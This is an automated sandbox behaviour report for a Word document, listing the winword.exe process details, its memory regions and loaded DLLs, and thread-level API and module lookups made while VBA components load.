81f1a5faaa792952e49c477f54c75beec7fd03d3a1c250db2b863ec2b669beee (SHA256)
Dokumente-UOM36417800369487.doc
Word Document
Created at 2018-08-01 10:16:00
Notifications (1/1)
The maximum number of reputation URL requests (10 per analysis) was exceeded. As a result, the reputation status could not be queried for all contacted URLs. In order to get the reputation status for all contacted URLs, please increase the 'Max URL Requests' setting in the system configurations.
Monitored Processes
Behavior Information - Sequential View
Process #1: winword.exe
8717
0
| Information | Value |
|---|---|
| ID | #1 |
| File Name | c:\program files\microsoft office\office15\winword.exe |
| Command Line | "C:\Program Files\Microsoft Office\Office15\WINWORD.EXE" /n |
| Initial Working Directory | C:\Users\BGC6u8Oy yXGxkR\Desktop\ |
| Monitor | Start Time: 00:00:48, Reason: Analysis Target |
| Unmonitor | End Time: 00:03:58, Reason: Self Terminated |
| Monitor Duration | 00:03:10 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x9a4 |
| Parent PID | 0x4f8 (c:\windows\explorer.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | F71GWAT\BGC6u8Oy yXGxkR |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
9E0
0x
9DC
0x
9D8
0x
9D4
0x
9D0
0x
9CC
0x
9C0
0x
9BC
0x
9B8
0x
9B4
0x
9B0
0x
9A8
0x
A30
0x
A50
0x
AA0
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00020fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00033fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00043fff | Pagefile Backed Memory | r |
|
|
|
- |
| locale.nls | 0x00050000 | 0x000b6fff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000000c0000 | 0x000c0000 | 0x000c0fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000000d0000 | 0x000d0000 | 0x001cffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000001d0000 | 0x001d0000 | 0x001d1fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000001e0000 | 0x001e0000 | 0x001e1fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000001f0000 | 0x001f0000 | 0x002b7fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000002c0000 | 0x002c0000 | 0x002c0fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000002d0000 | 0x002d0000 | 0x002d0fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000002e0000 | 0x002e0000 | 0x002effff | Private Memory | rw |
|
|
|
- |
| private_0x00000000002f0000 | 0x002f0000 | 0x002fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000300000 | 0x00300000 | 0x00330fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000340000 | 0x00340000 | 0x00341fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000350000 | 0x00350000 | 0x00359fff | Private Memory | rwx |
|
|
|
- |
| private_0x0000000000360000 | 0x00360000 | 0x0036ffff | Private Memory | - |
|
|
|
- |
| private_0x0000000000370000 | 0x00370000 | 0x0046ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000470000 | 0x00470000 | 0x00570fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000580000 | 0x00580000 | 0x0059ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000005b0000 | 0x005b0000 | 0x005b1fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000005d0000 | 0x005d0000 | 0x005dffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000005e0000 | 0x005e0000 | 0x006befff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000006c0000 | 0x006c0000 | 0x006cffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000700000 | 0x00700000 | 0x00700fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000710000 | 0x00710000 | 0x0080ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000810000 | 0x00810000 | 0x0084ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000008f0000 | 0x008f0000 | 0x008f6fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000900000 | 0x00900000 | 0x00901fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000910000 | 0x00910000 | 0x00910fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000920000 | 0x00920000 | 0x00920fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000930000 | 0x00930000 | 0x00933fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000940000 | 0x00940000 | 0x00940fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000950000 | 0x00950000 | 0x00950fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000960000 | 0x00960000 | 0x00a5ffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x00a60000 | 0x00d2efff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000d30000 | 0x00d30000 | 0x00e2ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000e30000 | 0x00e30000 | 0x00e31fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000e40000 | 0x00e40000 | 0x00e4ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000e50000 | 0x00e50000 | 0x00e50fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000e60000 | 0x00e60000 | 0x00e60fff | Pagefile Backed Memory | r |
|
|
|
- |
| msxml6r.dll | 0x00e70000 | 0x00e70fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000000e80000 | 0x00e80000 | 0x00e80fff | Pagefile Backed Memory | rw |
|
|
|
- |
| {afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000001c.db | 0x00f90000 | 0x00faffff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000fc0000 | 0x00fc0000 | 0x00fc0fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000fd0000 | 0x00fd0000 | 0x0100ffff | Private Memory | rw |
|
|
|
- |
| c_1255.nls | 0x01010000 | 0x01020fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000001080000 | 0x01080000 | 0x0108ffff | Private Memory | rw |
|
|
|
- |
| winword.exe | 0x01090000 | 0x01266fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000001270000 | 0x01270000 | 0x01e6ffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000001e90000 | 0x01e90000 | 0x01f8ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000001f90000 | 0x01f90000 | 0x02382fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000024d0000 | 0x024d0000 | 0x0254ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002560000 | 0x02560000 | 0x0265ffff | Private Memory | rw |
|
|
|
- |
| kernelbase.dll.mui | 0x02660000 | 0x0271ffff | Memory Mapped File | rw |
|
|
|
- |
| private_0x0000000002740000 | 0x02740000 | 0x0283ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000002840000 | 0x02840000 | 0x02c3ffff | Pagefile Backed Memory | r |
|
|
|
- |
| staticcache.dat | 0x02c40000 | 0x0356ffff | Memory Mapped File | r |
|
|
|
- |
| segoeui.ttf | 0x03570000 | 0x035eefff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000003660000 | 0x03660000 | 0x0366ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003700000 | 0x03700000 | 0x0373ffff | Private Memory | rwx |
|
|
|
- |
| private_0x0000000003780000 | 0x03780000 | 0x0387ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000038a0000 | 0x038a0000 | 0x038affff | Private Memory | rw |
|
|
|
- |
| private_0x00000000038e0000 | 0x038e0000 | 0x0391ffff | Private Memory | rwx |
|
|
|
- |
| pagefile_0x0000000003920000 | 0x03920000 | 0x0411ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000004120000 | 0x04120000 | 0x0421ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004290000 | 0x04290000 | 0x0438ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000043d0000 | 0x043d0000 | 0x044cffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000044d0000 | 0x044d0000 | 0x045cffff | Private Memory | rw |
|
|
|
- |
| tahoma.ttf | 0x045d0000 | 0x0467afff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000004690000 | 0x04690000 | 0x0478ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004850000 | 0x04850000 | 0x0488ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000048d0000 | 0x048d0000 | 0x049cffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000049d0000 | 0x049d0000 | 0x04dcffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000004dd0000 | 0x04dd0000 | 0x04fcffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004fd0000 | 0x04fd0000 | 0x050a0fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005150000 | 0x05150000 | 0x0518ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005190000 | 0x05190000 | 0x051cffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000051d0000 | 0x051d0000 | 0x055cffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000055d0000 | 0x055d0000 | 0x059d0fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000059e0000 | 0x059e0000 | 0x05de0fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005df0000 | 0x05df0000 | 0x061f0fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000006200000 | 0x06200000 | 0x063fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000006400000 | 0x06400000 | 0x067fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000037170000 | 0x37170000 | 0x3717ffff | Private Memory | rwx |
|
|
|
- |
| wwlib.dll | 0x63850000 | 0x64d0bfff | Memory Mapped File | rwx |
|
|
|
- |
| riched20.dll | 0x65290000 | 0x6541dfff | Memory Mapped File | rwx |
|
|
|
- |
| oart.dll | 0x65420000 | 0x661c7fff | Memory Mapped File | rwx |
|
|
|
- |
| dwrite.dll | 0x663a0000 | 0x664a9fff | Memory Mapped File | rwx |
|
|
|
- |
| adal.dll | 0x66500000 | 0x665b4fff | Memory Mapped File | rwx |
|
|
|
- |
| msptls.dll | 0x667e0000 | 0x668f5fff | Memory Mapped File | rwx |
|
|
|
- |
| msores.dll | 0x67300000 | 0x6bfeafff | Memory Mapped File | rwx |
|
|
|
- |
| mso.dll | 0x6bff0000 | 0x6d8d3fff | Memory Mapped File | rwx |
|
|
|
- |
| d3d10warp.dll | 0x6e930000 | 0x6ea5bfff | Memory Mapped File | rwx |
|
|
|
- |
| msointl.dll | 0x6ea60000 | 0x6edd0fff | Memory Mapped File | rwx |
|
|
|
- |
| msxml6.dll | 0x6f100000 | 0x6f257fff | Memory Mapped File | rwx |
|
|
|
- |
| webio.dll | 0x6fd30000 | 0x6fd7efff | Memory Mapped File | rwx |
|
|
|
- |
| winhttp.dll | 0x6fd80000 | 0x6fdd7fff | Memory Mapped File | rwx |
|
|
|
- |
| mscoreei.dll | 0x70980000 | 0x709f9fff | Memory Mapped File | rwx |
|
|
|
- |
| wwintl.dll | 0x70a00000 | 0x70abffff | Memory Mapped File | rwx |
|
|
|
- |
| osppc.dll | 0x70ac0000 | 0x70aecfff | Memory Mapped File | rwx |
|
|
|
- |
| d3d11.dll | 0x70af0000 | 0x70b72fff | Memory Mapped File | rwx |
|
|
|
- |
| d2d1.dll | 0x70b80000 | 0x70c39fff | Memory Mapped File | rwx |
|
|
|
- |
| office.odf | 0x716e0000 | 0x71bdffff | Memory Mapped File | rwx |
|
|
|
- |
| msi.dll | 0x71be0000 | 0x71e1ffff | Memory Mapped File | rwx |
|
|
|
- |
| msvcp100.dll | 0x71e50000 | 0x71eb8fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcr100.dll | 0x71ec0000 | 0x71f7efff | Memory Mapped File | rwx |
|
|
|
- |
| dxgi.dll | 0x723c0000 | 0x72442fff | Memory Mapped File | rwx |
|
|
|
- |
| d3d10_1core.dll | 0x72450000 | 0x72489fff | Memory Mapped File | rwx |
|
|
|
- |
| d3d10_1.dll | 0x72490000 | 0x724bbfff | Memory Mapped File | rwx |
|
|
|
- |
| mscoree.dll | 0x727a0000 | 0x727e9fff | Memory Mapped File | rwx |
|
|
|
- |
| msimg32.dll | 0x729a0000 | 0x729a4fff | Memory Mapped File | rwx |
|
|
|
- |
| winspool.drv | 0x738c0000 | 0x73910fff | Memory Mapped File | rwx |
|
|
|
- |
| ntmarta.dll | 0x740e0000 | 0x74100fff | Memory Mapped File | rwx |
|
|
|
- |
| wtsapi32.dll | 0x74370000 | 0x7437cfff | Memory Mapped File | rwx |
|
|
|
- |
| windowscodecs.dll | 0x74390000 | 0x7448afff | Memory Mapped File | rwx |
|
|
|
- |
| dwmapi.dll | 0x744c0000 | 0x744d2fff | Memory Mapped File | rwx |
|
|
|
- |
| gdiplus.dll | 0x74660000 | 0x747effff | Memory Mapped File | rwx |
|
|
|
- |
| uxtheme.dll | 0x747f0000 | 0x7482ffff | Memory Mapped File | rwx |
|
|
|
- |
| propsys.dll | 0x74830000 | 0x74924fff | Memory Mapped File | rwx |
|
|
|
- |
| comctl32.dll | 0x74970000 | 0x74b0dfff | Memory Mapped File | rwx |
|
|
|
- |
| version.dll | 0x74ee0000 | 0x74ee8fff | Memory Mapped File | rwx |
|
|
|
- |
| rsaenh.dll | 0x75200000 | 0x7523afff | Memory Mapped File | rwx |
|
|
|
- |
| cryptsp.dll | 0x75460000 | 0x75475fff | Memory Mapped File | rwx |
|
|
|
- |
| secur32.dll | 0x758a0000 | 0x758a7fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x758c0000 | 0x758dafff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x758e0000 | 0x758ebfff | Memory Mapped File | rwx |
|
|
|
- |
| winsta.dll | 0x75950000 | 0x75978fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrtremote.dll | 0x75980000 | 0x7598dfff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x75990000 | 0x7599afff | Memory Mapped File | rwx |
|
|
|
- |
| msasn1.dll | 0x75a00000 | 0x75a0bfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75a10000 | 0x75a59fff | Memory Mapped File | rwx |
|
|
|
- |
| cfgmgr32.dll | 0x75a60000 | 0x75a86fff | Memory Mapped File | rwx |
|
|
|
- |
| crypt32.dll | 0x75a90000 | 0x75bacfff | Memory Mapped File | rwx |
|
|
|
- |
| devobj.dll | 0x75bb0000 | 0x75bc1fff | Memory Mapped File | rwx |
|
|
|
- |
| wintrust.dll | 0x75c60000 | 0x75c8cfff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x75c90000 | 0x75d2ffff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x75d30000 | 0x75dfbfff | Memory Mapped File | rwx |
|
|
|
- |
| clbcatq.dll | 0x75e00000 | 0x75e82fff | Memory Mapped File | rwx |
|
|
|
- |
| urlmon.dll | 0x75e90000 | 0x75fc5fff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x75fd0000 | 0x75fe8fff | Memory Mapped File | rwx |
|
|
|
- |
| wldap32.dll | 0x75ff0000 | 0x76034fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x76040000 | 0x760ebfff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x760f0000 | 0x76d39fff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x76d40000 | 0x76d8dfff | Memory Mapped File | rwx |
|
|
|
- |
| setupapi.dll | 0x76dc0000 | 0x76f5cfff | Memory Mapped File | rwx |
|
|
|
- |
| iertutil.dll | 0x76f70000 | 0x7716afff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x77170000 | 0x77238fff | Memory Mapped File | rwx |
|
|
|
- |
| usp10.dll | 0x77240000 | 0x772dcfff | Memory Mapped File | rwx |
|
|
|
- |
|
For performance reasons, the remaining 136 entries are omitted.
The remaining entries can be found in flog.txt. |
||||||||
Threads
Thread 0x9d8
2
0
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| System | Get Time | type = Ticks, time = 110339 |
|
1 | |
| System | Get Time | type = Ticks, time = 114676 |
|
1 |
Thread 0x9a8
4975
0
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| System | Get Info | type = Operating System |
|
1 | |
| Module | Get Handle | module_name = c:\program files\microsoft office\office15\winword.exe, base_address = 0x1090000 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\system32\msi.dll, base_address = 0x71be0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\msi.dll, function = MsiProvideQualifiedComponentA, address_out = 0x71c0c331 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\msi.dll, function = MsiGetProductCodeA, address_out = 0x71c0ea84 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\msi.dll, function = MsiReinstallFeatureA, address_out = 0x71c91cf6 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\msi.dll, function = MsiProvideComponentA, address_out = 0x71c9f5d1 |
|
1 | |
| Module | Get Handle | module_name = C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\VBEUI.DLL, base_address = 0x0 |
|
1 | |
| Module | Load | module_name = C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\VBEUI.DLL, base_address = 0x670d0000 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = _MsoVBADigSigCallDlg@20, address_out = 0x671ffe80 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = _MsoVbaInitSecurity@4, address_out = 0x67188951 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = _MsoFIEPolicyAndVersion@8, address_out = 0x6717cd31 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = _MsoFAnsiCodePageSupportsLCID@8, address_out = 0x6718882e |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = _MsoFInitOffice@20, address_out = 0x6717cd4b |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = _MsoUninitOffice@4, address_out = 0x671396db |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = _MsoFGetFontSettings@20, address_out = 0x67131af9 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = _MsoRgchToRgwch@16, address_out = 0x67139bae |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = _MsoHrSimpleQueryInterface@16, address_out = 0x671334e1 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = _MsoHrSimpleQueryInterface2@20, address_out = 0x67133523 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = _MsoFCreateControl@36, address_out = 0x67134a26 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = _MsoFLongLoad@8, address_out = 0x67231250 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = _MsoFLongSave@8, address_out = 0x67231259 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = _MsoFGetTooltips@0, address_out = 0x6716dfac |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = _MsoFSetTooltips@4, address_out = 0x67192845 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = _MsoFLoadToolbarSet@24, address_out = 0x6717dd8b |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = _MsoFCreateToolbarSet@28, address_out = 0x671323c9 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = _MsoHpalOffice@0, address_out = 0x6713c568 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = _MsoFWndProcNeeded@4, address_out = 0x671318d2 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = _MsoFWndProc@24, address_out = 0x67132a70 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = _MsoFCreateITFCHwnd@20, address_out = 0x67131925 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = _MsoDestroyITFC@4, address_out = 0x6713958b |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = _MsoFPitbsFromHwndAndMsg@12, address_out = 0x67138820 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = _MsoFGetComponentManager@4, address_out = 0x671335a4 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = _MsoMultiByteToWideChar@24, address_out = 0x6713ac03 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = _MsoWideCharToMultiByte@32, address_out = 0x67134d33 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = _MsoHrRegisterAll@0, address_out = 0x671ff8b6 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = _MsoFSetComponentManager@4, address_out = 0x6713c179 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = _MsoFCreateStdComponentManager@20, address_out = 0x671319d5 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = _MsoFHandledMessageNeeded@4, address_out = 0x67136736 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = _MsoPeekMessage@8, address_out = 0x6713649f |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = _MsoFCreateIPref@28, address_out = 0x6712f9cf |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = _MsoDestroyIPref@4, address_out = 0x67139320 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = _MsoChsFromLid@4, address_out = 0x6712f864 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = _MsoCpgFromChs@4, address_out = 0x67131cc5 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = _MsoSetLocale@4, address_out = 0x6712f984 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = _MsoFSetHMsoinstOfSdm@4, address_out = 0x6713198e |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = _MsoSetVbaInterfaces@8, address_out = 0x671fff8d |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = _MsoGetControlInstanceId@8, address_out = 0x671d86e7 |
|
1 | |
| Environment | Get Environment String | name = DDRYBUR |
|
1 | |
| Module | Get Filename | process_name = c:\program files\microsoft office\office15\winword.exe, file_name_orig = C:\PROGRA~1\COMMON~1\MICROS~1\VBA\VBA7.1\VBE7.DLL, size = 260 |
|
1 | |
| Module | Load | module_name = C:\PROGRA~1\COMMON~1\MICROS~1\VBA\VBA7.1\1033\VBE7INTL.DLL, base_address = 0x70330000 |
|
1 | |
| Module | Get Filename | process_name = c:\program files\microsoft office\office15\winword.exe, file_name_orig = C:\PROGRA~1\COMMON~1\MICROS~1\VBA\VBA7.1\VBE7.DLL, size = 260 |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\Licenses |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CLASSES_ROOT\Licenses\8804558B-B773-11d1-BC3E-0000F87552E7, data = } |
|
1 | |
| Module | Load | module_name = OLEAUT32.DLL, base_address = 0x77360000 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = SysFreeString, address_out = 0x77363e59 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = LoadTypeLib, address_out = 0x77370aa2 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = RegisterTypeLib, address_out = 0x77381ea6 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = QueryPathOfRegTypeLib, address_out = 0x7739351b |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = UnRegisterTypeLib, address_out = 0x77391ca9 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = OleTranslateColor, address_out = 0x773926fa |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = OleCreateFontIndirect, address_out = 0x7738352f |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = OleCreatePictureIndirect, address_out = 0x77383df8 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = OleLoadPicture, address_out = 0x773c7c49 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = OleCreatePropertyFrameIndirect, address_out = 0x773c93fc |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = OleCreatePropertyFrame, address_out = 0x773c944a |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = OleIconToCursor, address_out = 0x773c776e |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = LoadTypeLibEx, address_out = 0x773707b7 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = OleLoadPictureEx, address_out = 0x773c70a1 |
|
1 | |
| Window | Create | class_name = ThunderMain, wndproc_parameter = 0 |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Module | Get Handle | module_name = c:\windows\system32\user32.dll, base_address = 0x77170000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\user32.dll, function = GetSystemMetrics, address_out = 0x771867cf |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\user32.dll, function = MonitorFromWindow, address_out = 0x77183622 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\user32.dll, function = MonitorFromRect, address_out = 0x77180ca1 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\user32.dll, function = MonitorFromPoint, address_out = 0x771794c9 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\user32.dll, function = EnumDisplayMonitors, address_out = 0x771834a3 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\user32.dll, function = GetMonitorInfoA, address_out = 0x7717c34e |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\user32.dll, function = EnumDisplayDevicesA, address_out = 0x7717c204 |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Module | Get Handle | module_name = oleaut32.dll, base_address = 0x77360000 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = DispCallFunc, address_out = 0x77373dcf |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = LoadTypeLibEx, address_out = 0x773707b7 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = UnRegisterTypeLib, address_out = 0x77391ca9 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = CreateTypeLib2, address_out = 0x77378e70 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarDateFromUdate, address_out = 0x77377684 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarUdateFromDate, address_out = 0x7737cc98 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = GetAltMonthNames, address_out = 0x773a903a |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarNumFromParseNum, address_out = 0x77376231 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarParseNumFromStr, address_out = 0x77375fea |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarDecFromR4, address_out = 0x77383f94 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarDecFromR8, address_out = 0x77384e9e |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarDecFromDate, address_out = 0x773adb72 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarDecFromI4, address_out = 0x77392a8c |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarDecFromCy, address_out = 0x773ad737 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarR4FromDec, address_out = 0x773ae015 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = GetRecordInfoFromTypeInfo, address_out = 0x773acc3d |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = GetRecordInfoFromGuids, address_out = 0x773ad1c4 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = SafeArrayGetRecordInfo, address_out = 0x773ad48c |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = SafeArraySetRecordInfo, address_out = 0x773ad4c6 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = SafeArrayGetIID, address_out = 0x773ad509 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = SafeArraySetIID, address_out = 0x7737e7bb |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = SafeArrayCopyData, address_out = 0x7737e496 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = SafeArrayAllocDescriptorEx, address_out = 0x7737ddf1 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = SafeArrayCreateEx, address_out = 0x773ad53f |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarFormat, address_out = 0x773b2055 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarFormatDateTime, address_out = 0x773b20ea |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarFormatNumber, address_out = 0x773b2151 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarFormatPercent, address_out = 0x773b21f5 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarFormatCurrency, address_out = 0x773b2288 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarWeekdayName, address_out = 0x773b2335 |
|
1 | |
